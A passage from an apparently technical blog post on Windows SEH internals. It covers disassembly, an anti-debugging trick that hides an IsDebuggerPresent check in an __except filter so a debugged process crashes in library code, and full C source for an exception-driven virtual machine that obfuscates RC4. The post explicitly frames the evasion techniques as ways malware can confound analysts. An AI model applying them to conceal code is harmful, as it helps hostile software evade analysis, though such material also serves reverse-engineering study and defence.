<span style="font-family: Courier New, Courier, monospace;">.text:00401D03 retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D04 ; ----------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D04</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D04 except_body:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D04 mov esp, [ebp+var_18]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D07 mov eax, large fs:30h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D0D mov al, [eax+2]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D10 mov [ebp+var_1C], eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D13</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D13 loc_401D13:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D13 mov [ebp+var_4], 0FFFFFFFFh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D1A mov al, byte ptr [ebp+var_1C]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D1D mov ecx, [ebp+var_10]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D20 mov large fs:0, ecx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D27 pop edi</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D28 pop esi</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D29 pop ebx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D2A mov esp, ebp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D2C pop ebp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D2D retn</span></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">From this listing you can see that the filter code always returns true, which means that the except body is always executed when an exception happens (and the code triggers one on purpose on line 00401CFA). On execution, the except body checks PEB.BeingDebugged in order to detect a debugger attached to the process, and returns true or false depending on the result. Later, the function that called the above code, will check such a flag and terminate execution in case of debugger detection.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>A better way to exploit the SEH implementation.</u></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">So, all this trouble just to hide the check for the debugger inside a try-except statement and to make it a bit more difficult to trace but, a</span><span style="font-family: Verdana, sans-serif;">s it is, this trick is not really being effective. Is it possible to do better?</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Well, if we put the debugger check inside the filter code rather than in the except body, we can make the filter return false in case of debugger detection, which means the library handler "__except_handler3" won't call the except body, and will terminate the execution instead. This would confuse things, because the decision on whether to terminate execution or not is taken inside a library code routine, rather than in the malware code itself. In this case, if someone debugs the malware he will find that the execution always terminates when running the standard Visual Studio exception handler code, and will have to dig into it to understand what's happening.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">It would look like this:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">__try</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> //...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> RaiseException(0, 0, 0, 0);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">__except(!IsDebuggerPresent())</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> //...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">Briefly: the code guarded in the try block will cause an exception; the filter routine is the check implemented via the IsDebuggerPresent API, which returns true if the debugger is attached and false otherwise. So, in case a debugger is detected, the filter returns zero, and the except block is never called, causing the process to simply crash.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOpHlXLURzdELlsg4sS9l5aUz34X4CMHj9C3JuYUUhR1Kb3IrDpdWCZbOUqrfe0KJfWnpgz-W3mZzzq_N6RGvMnMPl80IIoYIWtjLdb53izSPXQw9zn-GMKSZK4wCgGoXj0SZNpZkXIjw/s1600/schema.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOpHlXLURzdELlsg4sS9l5aUz34X4CMHj9C3JuYUUhR1Kb3IrDpdWCZbOUqrfe0KJfWnpgz-W3mZzzq_N6RGvMnMPl80IIoYIWtjLdb53izSPXQw9zn-GMKSZK4wCgGoXj0SZNpZkXIjw/s1600/schema.jpg" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">Of course, you can obfuscate the code in the filter routine and make it not so obvious, and this will leave the analyst puzzling in why is the code crashing inside Visual Studio standard library routine :).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>"__except_handler4"?!</u></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">"__except_handler3" is the standard library code, but it was susceptible to corruption in case of stack overflow, and this <a href="http://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/">caused security problems</a>. So with new versions of Visual Studio, the function was updated to "__except_handler4", which is essentially the same routine with additional features. </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In particular, it uses canaries to protect the SEH data, in order to make sure that the pointers to the exception handlers have not been overwritten: </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.text:004010C5 @__security_check_cookie@4 proc near ; DATA XREF: __except_handler4+11 o</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004010C5 cmp ecx, ___security_cookie</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004010CB jnz short loc_4010CF</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004010CD rep retn</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">.text:004010CF</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004010CF loc_4010CF: ; CODE XREF: __security_check_cookie(x)+6 j</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004010CF jmp ___report_gsfailure</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004010CF @__security_check_cookie@4 endp</span><br />
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<br />
<span style="font-family: Verdana, sans-serif;">Furthermore, the old "__except_handler3" was library code that was linked and embedded in the user executable, while "__except_handler4" instead is only a small wrapper for the API "_except_handler4_common", exported by the Visual Studio runtime dll (module msvcr*.dll):</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.text:00401799 mov edi, edi</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040179B push ebp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040179C mov ebp, esp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040179E push [ebp+arg_C]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017A1 push [ebp+arg_8]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017A4 push [ebp+arg_4]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017A7 push [ebp+arg_0]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017AA push offset @__security_check_cookie@4 ; __security_check_cookie(x)</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017AF push offset ___security_cookie</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017B4 call _except_handler4_common</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017B9 add esp, 18h</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017BC pop ebp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017BD retn</span><br />
<div>
<span style="font-family: Verdana, sans-serif;"><u><br /></u></span>
<span style="font-family: Verdana, sans-serif;"><u><br /></u></span></div>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Obfuscating algorithms.</u></span></div>
<div>
<br />
<span style="font-family: Verdana, sans-serif;">Now that we know all the details related to the SEH implementation in Visual Studio, I would like to propose a simple yet powerful idea to obfuscate algorithms.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Briefly, you can:</span><br />
<br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">Create a set of basic virtualized opcodes, each one represented by a different function.</span></li>
<li><span style="font-family: Verdana, sans-serif;">Use these opcodes to write an algorithm encoding it in a data structure (each opcode will be associated to a particular "id number").</span></li>
<li><span style="font-family: Verdana, sans-serif;">Execute each instruction of the program through a different filter expression. This means that if your algorithm consists of "n" opcodes, you will have "n" try-except blocks (that is, "n" filter expressions) and you will have to generate "n" exc</span><span style="font-family: Verdana, sans-serif;">eptions as well.</span></li>
</ul>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS8I9gdipxzGb51icVFSr-ws3h96-uxNBRY4pbZeERWKwl5Am61A0GMFGmzC7BdHVdDpM5nhoAEkpAbUmQ8ig68aukO4FoGLtpyD5aJB1j6eFQIbZSt9IiN80yvywm_VcUU6rVx9VWdes/s1600/imm1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS8I9gdipxzGb51icVFSr-ws3h96-uxNBRY4pbZeERWKwl5Am61A0GMFGmzC7BdHVdDpM5nhoAEkpAbUmQ8ig68aukO4FoGLtpyD5aJB1j6eFQIbZSt9IiN80yvywm_VcUU6rVx9VWdes/s1600/imm1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">Here is the source code of a working POC that implements the RC4 algorithm:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <windows.h>
#include <stdio.h>
// globals used to keep the jl flags and the ip
int flags, eip;
// opcodes
#define OPC_MOD 0x11
#define OPC_XOR 0x12
#define OPC_CMP 0x13
#define OPC_JL 0x14
#define OPC_JMP 0x15
#define OPC_HLT 0x16
#define OPC_MOV 0x17
#define OPC_ADD 0x18
// operand types
#define OP_V 1 // variable
#define OP_C 2 // constant
#define OP_P 3 // pointer
// sizes
#define OP_BYTE 1
#define OP_DWORD 2
// opcode characterization
typedef struct _OPCODE
{
BYTE opcode;
BYTE type_op1;
BYTE type_op2;
BYTE size;
} OPCODE;
// macro to fill the opcode arrays quickly
#define MAKE_OPC(__opc, __op1, __op2, __size, __param1, __param2) \
(__opc | (__op1 << 8) | (__op2 << 16) | (__size << 24)), \
(DWORD)__param1, \
(DWORD)__param2
// EXC_RUN to execute the opcodes arrays "rc4_init_op" and "rc4_crypt_op"
#define EXC_RUN(__myprogram) \
eip = 0; flags = 0; \
while(eip != EIP_HALT){ EXC_TRY() EXC_EXCEPTION(__myprogram) EXC_USED_OPCODES() eip += 3;}
#define EIP_HALT 0xFFFFFFFF
#define EXC_TRY() \
__try{ __try{ __try{ __try{ __try{ __try{ __try{ __try{
#define EXC_EXCEPTION(__program) RaiseException(__program[eip], 0, 2, (ULONG_PTR*)(&__program[eip+1]));
#define EXC_INSTR(__opc) }__except(__opc(GetExceptionCode(), GetExceptionInformation())){}
#define EXC_USED_OPCODES() \
EXC_INSTR(cmp) EXC_INSTR(mov) EXC_INSTR(add) EXC_INSTR(hlt) \
EXC_INSTR(jmp) EXC_INSTR(jl) EXC_INSTR(mod) EXC_INSTR(xor)
// flags values after cmp
#define GT 0
#define LT 1
#define EQ 2
// checks the opcode and extracts its operands
BOOL chckopc_extr(BYTE opcode, BYTE opc, DWORD **op1, DWORD **op2, struct _EXCEPTION_POINTERS *ep)
{
EXCEPTION_RECORD *er;
if(opcode != opc) return false;
er = ep->ExceptionRecord;
*op1 = (DWORD*)(er->ExceptionInformation[0]);
*op2 = (DWORD*)(er->ExceptionInformation[1]);
return true;
}
// reads an operand given its type and size
DWORD readop(DWORD *op, BYTE type, BYTE size)
{
switch(type)
{
case OP_V:
if(size == OP_BYTE)
return *((BYTE*)op);
else
return *op;
case OP_C:
return (DWORD)op;
case OP_P:
if(size == OP_BYTE)
return *((BYTE*)(*op));
else
return *((DWORD*)(*op));
}
return 0;
}
// assigns data to an operand given its type and size
void assignop(DWORD *op, BYTE type, BYTE size, DWORD data)
{
switch(type)
{
case OP_V:
if(size == OP_BYTE)
*((BYTE*)op) = (BYTE)data;
else
*op = data;
break;
case OP_C:
*op = data;
break;
case OP_P:
if(size == OP_BYTE)
*((BYTE*)(*op)) = (BYTE)data;
else
*((DWORD*)(*op)) = data;
break;
}
}
// -----------------------------------------------------------------
// Opcodes
// x = x % y
int mod(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
DWORD *op1, *op2;
if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_MOD, &op1, &op2, ep))
return false;
*op1 = *op1 % *op2;
return true;
}
// x = x ^ y
int xor(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
DWORD *op1, *op2;
if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_XOR, &op1, &op2, ep))
return false;
*op1 = *op1 ^ *op2;
return true;
}
// unsigned compare
int cmp(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
DWORD src1, src2;
DWORD *op1, *op2;
if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_CMP, &op1, &op2, ep))
return false;
src1 = readop(op1, ((OPCODE*)&code)->type_op1, ((OPCODE*)&code)->size);
src2 = readop(op2, ((OPCODE*)&code)->type_op2, ((OPCODE*)&code)->size);
(src1 > src2) ? flags = GT : ((src1 < src2) ? flags = LT : flags = EQ);
return true;
}
// eip = x IFF flags == LT
int jl(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
DWORD *op1, *op2;
if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_JL, &op1, &op2, ep))
return false;
if(flags == LT)
eip = ((DWORD)op1 * 3) - 3;
return true;
}
// eip = x
int jmp(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
DWORD *op1, *op2;
if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_JMP, &op1, &op2, ep))
return false;
eip = ((DWORD)op1 * 3) - 3;
return true;
}
// eip = EIP_HALT
int hlt(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
DWORD *op1, *op2;
if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_HLT, &op1, &op2, ep))
return false;
eip = EIP_HALT - 3;
return true;
}
// move data
int mov(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
DWORD src2;
DWORD *op1, *op2;
if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_MOV, &op1, &op2, ep))
return false;
src2 = readop(op2, ((OPCODE*)&code)->type_op2, ((OPCODE*)&code)->size);
assignop(op1, ((OPCODE*)&code)->type_op1, ((OPCODE*)&code)->size, src2);
return true;
}
// add data
int add(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
DWORD src1, src2;
DWORD *op1, *op2;
if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_ADD, &op1, &op2, ep))
return false;
src1 = readop(op1, ((OPCODE*)&code)->type_op1, ((OPCODE*)&code)->size);
src2 = readop(op2, ((OPCODE*)&code)->type_op2, ((OPCODE*)&code)->size);
src2 += src1;
assignop(op1, ((OPCODE*)&code)->type_op1, ((OPCODE*)&code)->size, src2);
return true;
}
// -----------------------------------------------------------------
void main(void)
{
// test vector:
// ascii key 0123456789abcdef
// hex plaintext: 0000000000000000
// hex ciphertext: 7494c2e7104b0879
BYTE *temp_perm, *temp_perm2, *temp_key, *temp_plain, *temp_cipher;
BYTE perm_byte, swap_byte;
DWORD j, index1, index2, key_index, key_byte;
int i, keylen = 8, plainlen = 8;
BYTE perm[256];
BYTE key[8] = {0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef};
BYTE plaintext[8] = {0, 0, 0, 0, 0, 0, 0, 0};
BYTE ciphertext[8];
temp_perm = perm;
DWORD rc4_init_op[] = {
/* 000 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &i, 0), // init permutation box
/* 001 */ MAKE_OPC(OPC_MOV, OP_P, OP_V, OP_BYTE, &temp_perm, &i),
/* 002 */ MAKE_OPC(OPC_ADD, OP_V, OP_C, OP_DWORD, &temp_perm, 1),
/* 003 */ MAKE_OPC(OPC_ADD, OP_V, OP_C, OP_DWORD, &i, 1),
/* 004 */ MAKE_OPC(OPC_CMP, OP_V, OP_C, OP_DWORD, &i, 256),
/* 005 */ MAKE_OPC(OPC_JL, 0, 0, 0, 1, 0),
/* 006 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_BYTE, &index1, 0),
/* 007 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_BYTE, &index2, 0),
/* 008 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &j, 0), // apply the key to the permutation box
/* 009 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &i, 0),
/* 010 */ MAKE_OPC(OPC_MOV, OP_V, OP_V, OP_DWORD, &key_index, &i),
/* 011 */ MAKE_OPC(OPC_MOD, 0, 0, 0, &key_index, &keylen),
/* 012 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_key, key),
/* 013 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_key, &key_index),
/* 014 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &key_byte, &temp_key),
/* 015 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm, perm),
/* 016 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm, &i),
/* 017 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &perm_byte, &temp_perm),
/* 018 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_BYTE, &j, &perm_byte),
/* 019 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_BYTE, &j, &key_byte),
/* 020 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm, perm), // swap bytes
/* 021 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm, &j),
/* 022 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &swap_byte, &temp_perm),
/* 023 */ MAKE_OPC(OPC_MOV, OP_P, OP_V, OP_BYTE, &temp_perm, &perm_byte),
/* 024 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm, perm),
/* 025 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm, &i),
/* 026 */ MAKE_OPC(OPC_MOV, OP_P, OP_V, OP_BYTE, &temp_perm, &swap_byte),
/* 027 */ MAKE_OPC(OPC_ADD, OP_V, OP_C, OP_DWORD, &i, 1),
/* 028 */ MAKE_OPC(OPC_CMP, OP_V, OP_C, OP_DWORD, &i, 256),
/* 029 */ MAKE_OPC(OPC_JL, 0, 0, 0, 10, 0),
/* 030 */ MAKE_OPC(OPC_HLT, 0, 0, 0, 0, 0)
};
DWORD rc4_crypt_op[] = {
/* 000 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &i, 0),
/* 001 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &index1, 0),
/* 002 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &index2, 0),
/* 003 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &j, 0),
/* 004 */ MAKE_OPC(OPC_ADD, OP_V, OP_C, OP_BYTE, &index1, 1), // update indices
/* 005 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm, perm),
/* 006 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm, &index1),
/* 007 */ MAKE_OPC(OPC_ADD, OP_V, OP_P, OP_BYTE, &index2, &temp_perm),
/* 008 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &swap_byte, &temp_perm), // swap bytes
/* 009 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm2, perm),
/* 010 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm2, &index2),
/* 011 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &perm_byte, &temp_perm2),
/* 012 */ MAKE_OPC(OPC_MOV, OP_P, OP_V, OP_BYTE, &temp_perm2, &swap_byte),
/* 013 */ MAKE_OPC(OPC_MOV, OP_P, OP_V, OP_BYTE, &temp_perm, &perm_byte),
/* 014 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm, perm), // xor
/* 015 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm, &index1),
/* 016 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &j, &temp_perm),
/* 017 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm, perm),
/* 018 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm, &index2),
/* 019 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &perm_byte, &temp_perm),
/* 020 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_BYTE, &j, &perm_byte),
/* 021 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_plain, plaintext),
/* 022 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_plain, &i),
/* 023 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &perm_byte, &temp_plain),
/* 024 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm, perm),
/* 025 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm, &j),
/* 026 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &swap_byte, &temp_perm),
/* 027 */ MAKE_OPC(OPC_XOR, 0, 0, 0, &swap_byte, &perm_byte),
/* 028 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_cipher, ciphertext),
/* 029 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_cipher, &i),
/* 030 */ MAKE_OPC(OPC_MOV, OP_P, OP_V, OP_BYTE, &temp_cipher, &swap_byte),
/* 031 */ MAKE_OPC(OPC_ADD, OP_V, OP_C, OP_DWORD, &i, 1),
/* 032 */ MAKE_OPC(OPC_CMP, OP_V, OP_V, OP_DWORD, &i, &plainlen),
/* 033 */ MAKE_OPC(OPC_JL, 0, 0, 0, 4, 0),
/* 034 */ MAKE_OPC(OPC_HLT, 0, 0, 0, 0, 0)
};
EXC_RUN(rc4_init_op);
EXC_RUN(rc4_crypt_op);
printf("cipher: %02X %02X %02X %02X %02X %02X %02X %02X\n",
ciphertext[0], ciphertext[1], ciphertext[2], ciphertext[3],
ciphertext[4], ciphertext[5], ciphertext[6], ciphertext[7]);
}
</code></pre>
</div>
<br />
<br />
<span style="font-family: Verdana, sans-serif;">Following this idea, you can easily implement any other algorithm and this bears several advantages in term of obfuscation. In fact, in order to understand the code, you have to analyze the array containing all the opcodes, that is dynamically generated:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401678 mov [ebp+var_160], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:0040167E mov [ebp+var_15C], 1</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401688 mov [ebp+var_158], 2020113h</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401692 mov [ebp+var_154], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401698 mov [ebp+var_150], 100h</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016A2 mov [ebp+var_14C], 14h</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016AC mov [ebp+var_148], 0Ah</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016B6 xor ebx, ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016B8 mov [ebp+var_144], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016BE mov [ebp+var_140], 16h</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016C8 mov [ebp+var_13C], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016CE mov [ebp+var_138], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016D4 mov [ebp+var_44C], eax</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016DA lea ebx, [ebp+var_458]</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016E0 mov [ebp+var_448], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016E6 mov [ebp+var_444], 0</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016F0 mov [ebp+var_440], eax</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016F6 lea ebx, [ebp+var_464]</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016FC mov [ebp+var_43C], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401702 mov [ebp+var_438], 0</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:0040170C mov [ebp+var_434], eax</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401712 lea ebx, [ebp+var_460]</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401718 mov [ebp+var_430], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:0040171E mov [ebp+var_42C], 0</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401728 mov [ebp+var_428], eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
